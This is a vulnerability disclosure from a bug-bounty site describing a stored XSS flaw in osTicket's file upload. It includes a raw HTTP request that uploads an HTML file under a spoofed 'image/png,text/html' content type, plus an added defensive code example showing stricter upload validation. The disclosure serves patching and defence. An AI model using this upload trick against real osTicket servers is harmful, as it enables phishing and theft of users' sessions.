huntr report C2BB34AC-452D-4624-A1B9-C5B54F52F0CD by theworstcomrade
History: Oct 18, 2021 - 8:47 p.m.

Cross-site Scripting (XSS) - Stored in osticket/osticket

2021-10-18 20:47:48 | theworstcomrade | www.huntr.dev

EPSS: 0.001 (Low), Percentile: 32.5%

Description

As stated on its GitHub profile, osTicket is a widely-used open source support ticket system. During source code research I discovered a bad uploaded-file type check, which is controlled by the user. An unauthenticated user can upload a malicious HTML/JS file.

From OWASP: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Proof of Concept

POST /ajax.php/draft/ticket.client.jfi710uc6f1h/attach HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------124988469840978117853377254190
Content-Length: 6456
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/open.php
Cookie: OSTSESSID=2h2moaijbnk5nojfi710uc6f1h

-----------------------------124988469840978117853377254190
Content-Disposition: form-data; name="file[]"; filename="osticket-phish.html"
Content-Type: image/png,text/html

<html>
<img src>
</html>

-----------------------------124988469840978117853377254190--
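The request above declares Content-Type: image/png,text/html for a part whose bytes are plain HTML. The following added example (not osTicket's code; the allowlist, function names and sample files are assumptions) contrasts a check that trusts the declared type with one that derives the type from the bytes, requires it to agree with the extension, and serves the stored file with download-only headers:

```python
"""Upload validation that does not trust the client-declared Content-Type.
Added illustration, not osTicket's code; the allowlist is an assumption."""
from typing import Optional, Tuple

ALLOWED = {"image/png", "image/jpeg", "image/gif"}

# Leading bytes (magic numbers) of each allowed type.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
EXT = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif"}

def weak_check(declared: str) -> bool:
    """Models a filter that trusts the multipart Content-Type header:
    'image/png,text/html' passes because one token is allowlisted."""
    return any(t.strip().lower() in ALLOWED for t in declared.split(","))

def sniff(data: bytes) -> Optional[str]:
    """Return the type implied by the magic bytes, or None if unrecognised."""
    return next((m for magic, m in MAGIC.items() if data.startswith(magic)), None)

def hardened_check(filename: str, declared: str, data: bytes) -> Tuple[bool, dict]:
    """Accept only if the sniffed type is allowlisted and agrees with the
    extension; `declared` is deliberately ignored. The returned headers force a
    download and stop the browser from sniffing a stored file as HTML."""
    del declared
    mime = sniff(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if mime is None or EXT.get(ext) != mime:
        return False, {}
    safe_name = "".join(c for c in filename if c.isalnum() or c in "._-")
    return True, {
        "Content-Type": mime,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }

# Constructed sample uploads: the PoC body from the report and a PNG stub.
PHISH = b"<html>\n<img src>\n</html>\n"
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # magic bytes only, not a real image

if __name__ == "__main__":
    print(weak_check("image/png,text/html"))                                       # True
    print(hardened_check("osticket-phish.html", "image/png,text/html", PHISH)[0])  # False
    print(hardened_check("logo.png", "image/png", PNG)[0])                         # True
```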


PoC Video

https://www.youtube.com/watch?v=iasn6dEDnCw

Impact

From OWASP: An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.

In this case the generated local link is valid for a few hours and is visible to the issue author and administrators.
